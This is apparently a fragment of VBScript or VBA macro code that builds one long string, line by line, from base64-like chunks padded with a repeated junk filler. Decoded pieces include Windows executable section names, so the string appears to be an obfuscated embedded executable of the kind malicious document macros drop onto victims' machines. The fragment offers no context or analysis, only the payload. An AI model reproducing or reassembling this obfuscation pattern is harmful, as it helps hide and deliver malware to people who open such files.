RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%CC@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%Eg@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%C50ZXh0@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%NE4@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%U@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%G@@&&^%^#%ucnNyYw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%CQD@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%BS@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%B@@&&^%^#%LnJlbG9j@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%M@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%K@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%Vg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%Qg@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%Qbg@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Eg@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%U@@&&^%^#%9DY@@&&^%^#%@@&&^%^#%Ow1"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%D@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OBs@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%C4@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%D4r@@&&^%^#%iYWKwImFgIo@@&&^%^#%g@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Bio6KwImFv4J@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%oDg@@&&^%^#%@@&&^%^#%Cio@"
RNhrp = RNhrp & "@&&^%^#%PisCJhYr@@&&^%^#%iYW@@&&^%^#%igE"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GKjor@@&&^%^#"
RNhrp = RNhrp & "%iYW/gk@@&&^%^#%@@&&^%^#%CgP@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%KKg@@&&^%^#%TM@@&&^%^#%M@"
RNhrp = RNhrp & "@&&^%^#%r@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%E@@&&^%^#%@@&&^%^#%BEr@@&&"
RNhrp = RNhrp & "^%^#%iYWKwImFigK@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%GK@@&&^%^#%s@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%Y6Lg@@&&^%^#%@@&&^%^#%@@&&^%^#%CYgB@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%DhK@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%cx@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%q@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%g@@&&^%^#%@@&&^%^#%BC@@&&^%^#%F"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%ODY@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%BzEQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Co@@&&^%^#%B@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%EON3///8mI@@&&^%^#%I@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%4H@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%HMS@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%Kg@@&&^%^#%M@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%Q4O@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%C@@&&^%^#%E@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%/g4@@&&^%^#%@@&&^%^#%P4M"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%BFBw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Kn///+z////lf///wo@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Cp////w////x4@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%w@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%DjV////cxM@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%q@@&&^%^#%B@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BC@@&&^%^#%G@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%OMH///8qPisCJhZ+"
RNhrp = RNhrp & "@@&&^%^#%Q@@&&^%^#%@@&&^%^#%BG8U@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKj4r@@&&^%^#%iYWfgI@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%RvFQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Cio+KwImFn4D@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%EbxY@@&&^%^#%@@&&^%^#%@@&&^%^#%oq"
RNhrp = RNhrp & "PisCJhZ+B@@&&^%^#%@@&&^%^#%@@&&^%^#%BG8X"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%KKhor@@&&^%^#"
RNhrp = RNhrp & "%iYWFyo@@&&^%^#%GisCJhYWKgDiKwImFn4G@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%EFCgi@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%GOR4@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%By@@&&^%^#%Q@@&&^%^#%@@&&^%^#%cN@@"
RNhrp = RNhrp & "&&^%^#%I@@&&^%^#%@@&&^%^#%@@&&^%^#%CKCM@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%ZvIw@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%CnMk@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "g@@&&^%^#%Y@@&&^%^#%@@&&^%^#%@@&&^%^#%R+"
RNhrp = RNhrp & "Bg@@&&^%^#%@@&&^%^#%BCo@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%qKwImFn4H@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%EKg@@&&^%^#%uKwImFgK@@&&^"
RNhrp = RNhrp & "%^#%Bw@@&&^%^#%@@&&^%^#%BCpOKwImFgD+CQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%/gkB@@&&^%^#%Cgl@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKj4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%@@&&^%^#%@@&&^%^#%oH@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%CioaKwImFhcq@@&&"
RNhrp = RNhrp & "^%^#%Bor@@&&^%^#%iYWFio@@&&^%^#%disCJhYr"
RNhrp = RNhrp & "@@&&^%^#%iYWcyc@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%YoKQ@@&&^%^#%@@&&^%^#%BnQJ@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%Cg@@&&^%^#%g@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Qq@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%+KwImFisCJhYCKCw@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%YqKisCJhZ+C@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%BCo@@&&^%^#%PisCJhY@@&&^%^#%/gk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%Cgm@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%KKhor@@&&^%^#%iYWFyo@@&&^%^#%GisCJhYW"
RNhrp = RNhrp & "Kg@@&&^%^#%6KwImFv4J@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%oJw@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%"
RNhrp = RNhrp & "KisCJhYoLg@@&&^%^#%@@&&^%^#%Bio@@&&^%^#%"
RNhrp = RNhrp & "LisCJhY@@&&^%^#%KCg@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%YqPisCJhYr@@&&^%^#%iYW@@&&^%^#%igx"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GKhswDwDKB@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%ESsCJhYg@@&&^%^#%@@&&^%^#%w@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%Cgy@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%Gcyg@@&&^%^#%@@&&^%^#%@@&&^%^#%ol"
RNhrp = RNhrp & "KDM@@&&^%^#%@@&&^%^#%@@&&^%^#%YoN@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%BgIoNQ@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%BnIh@@&&^%^#%@@&&^%^#%Bwci0@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%H@@&&^%^#%oNg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "BnIx@@&&^%^#%@@&&^%^#%Bwcj8@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%H@@&&^%^#%oNg@@&&^%^#%@@&&^%^#%BnJD"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%Bwck8@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%H@@&&^%^#%oNg@@&&^%^#%@@&&^%^#%BnJT@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Bwcl8@@&&^%^#%@@&&^%^#%H@@"
RNhrp = RNhrp & "&&^%^#%oNg@@&&^%^#%@@&&^%^#%BnJj@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%BwcnU@@&&^%^#%@@&&^%^#%H@@&&^%"
RNhrp = RNhrp & "^#%oNg@@&&^%^#%@@&&^%^#%BnJ5@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%Bwcos@@&&^%^#%@@&&^%^#%H@@&&^%^#%o"
RNhrp = RNhrp & "Ng@@&&^%^#%@@&&^%^#%BnKP@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%BwcqE@@&&^%^#%@@&&^%^#%H@@&&^%^#%oNg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BnKl@@&&^%^#%@@&&^%^#%Bw"
RNhrp = RNhrp & "crE@@&&^%^#%@@&&^%^#%H@@&&^%^#%oNg@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%BnK1@@&&^%^#%@@&&^%^#%Bwcsc@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%H@@&&^%^#%oNg@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%BnLL@@&&^%^#%@@&&^%^#%Bwct0@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%H@@&&^%^#%oNg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%BnLh@@&&^%^#%@@&&^%^#%BwcvM@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%H@@&&^%^#%oNg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Big3@@&&^%^#%@@&&^%^#%@@&&^%^#%GCgYoO@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%BgsHKDU@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%YL@@&&^%^#%3Kx@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%BwFig5@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%GOsk@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%fGig6@@&&^%^#%@@&&^%^#%@@&&^%^#%GJXL3"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%BwKDs@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%YTBBIE/hYj@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%Bbx0@@&&^%^#%@@&&^%^#%@@&&^%^#%py"
RNhrp = RNhrp & "+w@@&&^%^#%@@&&^%^#%cCg8@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GDHIF@@&&^%^#%QBwKD0@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%Yo@@&&^%^#%w@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Kzp@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%cyo@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%pzKw@@&&^%^#%@@&&^%^#%ChMFEQUXKD4@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%YRBXIR@@&&^%^#"
RNhrp = RNhrp & "%QBwKD8@@&&^%^#%@@&&^%^#%@@&&^%^#%YRBXKF"
RNhrp = RNhrp & "@@&&^%^#%QBwCCh@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GKEE@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%YlEQUoQg@@&&^%^#%@@&&^%^#%BihD@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GJn4s@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%KcvcB@@&&^%^#%H@@&&^%^#%XKEQ@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%YNCShF@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GclMC@@&&^%^#%H@@&&^%"
RNhrp = RNhrp & "^#%oB@@&&^%^#%@@&&^%^#%@@&&^%^#%KzoM@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%CXJT@@&&"
RNhrp = RNhrp & "^%^#%gBwCChG@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "CShH@@&&^%^#%@@&&^%^#%@@&&^%^#%GByhI@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%GKEk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%YmOPsC@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%Ecsc@@&&^%^#%@@&&^%^#%H@@&&^%^#%W"
RNhrp = RNhrp & "KDk@@&&^%^#%@@&&^%^#%@@&&^%^#%Y63gI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%B8aKDo@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%YTBhEGcy4@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%pyBQE@@&&^%^#%cChK@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%GK@@&&^%^#%U@@&&^%^#%@@&&^%^#%Cs6"
RNhrp = RNhrp & "qQI@@&&^%^#%@@&&^%^#%Cg7@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GEwQSBP4WIw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%W8d@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "cvs@@&&^%^#%@@&&^%^#%H@@&&^%^#%oQ@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%BhMHEQZy9w@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%cBEHKEs@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%YTCHMq@@&&^%^#%@@&&^%^#%@@&&^%^#%Kcys@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%oTCREJFyg+@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%GEQlyEQE@@&&^%^#%"
RNhrp = RNhrp & "cCg/@@&&^%^#%@@&&^%^#%@@&&^%^#%GEQlyhQE@"
RNhrp = RNhrp & "@&&^%^#%cBEIKE@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%YoQQ@@&&^%^#%@@&&^%^#%BiURCShC"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GKEM@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%YmFBMKcl0C@@&&^%^#%HBy"
RNhrp = RNhrp & "eQI@@&&^%^#%cChM@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%GKE0@@&&^%^#%@@&&^%^#%@@&&^%^#%YTCt0S"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%JShO"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GEwsoTw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%Bt0@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%EQo5@@&&^%^#%QI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%BQTDBEKFHJ7@@&&^%^#%gBwF40T"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%BJRZymQI@@&&^"
RNhrp = RNhrp & "%^#%cKIUFBQoU@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "BihR@@&&^%^#%@@&&^%^#%@@&&^%^#%GcqkC@@&&"
RNhrp = RNhrp & "^%^#%H@@&&^%^#%RCChS@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%GKDs@@&&^%^#%@@&&^%^#%@@&&^%^#%aM"
RNhrp = RNhrp & "Iw@@&&^%^#%@@&&^%^#%@@&&^%^#%ShT@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GEw0RDShU@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%GEw4RDihV@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GOngB@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%RChRyxQI@@&&^%^#%cBeNEw@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%SUWEQ6iJRMPFBQXjQQ@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%ElFhecJRMQKF@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%YREBaROR8@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%RDxaaKE0@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%bQCQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%ShW@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%GKFc@@&&^%^#%@@&&^%^#%@@&&^%^#%Z0"
RNhrp = RNhrp & "CQ@@&&^%^#%@@&&^%^#%@@&&^%^#%RMOKE0@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%YTDBEMFHLj@@&&^%^#"
RNhrp = RNhrp & "%gBwF40T@@&&^%^#%@@&&^%^#%@@&&^%^#%BJRZy"
RNhrp = RNhrp & "/QI@@&&^%^#%cKIUFChY@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%GEQwUchkD@@&&^%^#%H@@&&^%^#%XjRM@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%ElFh8lKDo@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%ZyLwM@@&&^%^#%cHJT"
RNhrp = RNhrp & "@@&&^%^#%wBwcl0D@@&&^%^#%H@@&&^%^#%oWQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BqIUFChY@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GEQwUcnsD@@&&^%^#%H@@&&^%^#%X"
RNhrp = RNhrp & "jRM@@&&^%^#%@@&&^%^#%@@&&^%^#%ElFnKP@@&&"
RNhrp = RNhrp & "^%^#%wBwEQwUchkD@@&&^%^#%H@@&&^%^#%WjRM@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%EUFBQoU@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%BihN@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GEQgoWg@@&&^%^#%@@&&^%^#%BihT"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GohQUKFg@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%YRDBRyKgQ@@&&^%^#%"
RNhrp = RNhrp & "cBeNEw@@&&^%^#%@@&&^%^#%@@&&^%^#%SUWEQwU"
RNhrp = RNhrp & "chkD@@&&^%^#%H@@&&^%^#%WjRM@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%EUFBQoU@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%BihR@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "KFs@@&&^%^#%@@&&^%^#%@@&&^%^#%aiFBQoW@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%BhEMFHJMB@@&&^%^"
RNhrp = RNhrp & "#%BwF40T@@&&^%^#%@@&&^%^#%@@&&^%^#%BJRZy"
RNhrp = RNhrp & "Z@@&&^%^#%Q@@&&^%^#%cKIUFChY@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%GEQwUcngE@@&&^%^#%H@@&&^%"
RNhrp = RNhrp & "^#%XjRM@@&&^%^#%@@&&^%^#%@@&&^%^#%ElFhaM"
RNhrp = RNhrp & "@@&&^%^#%w@@&&^%^#%@@&&^%^#%@@&&^%^#%aIU"
RNhrp = RNhrp & "FChY@@&&^%^#%@@&&^%^#%@@&&^%^#%GEQwUcp@@"
RNhrp = RNhrp & "&&^%^#%E@@&&^%^#%H@@&&^%^#%WjRM@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%EUFBQXKFw@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Ym3RI@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%lKE4@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%YTEShP@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "3Q@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Dd"
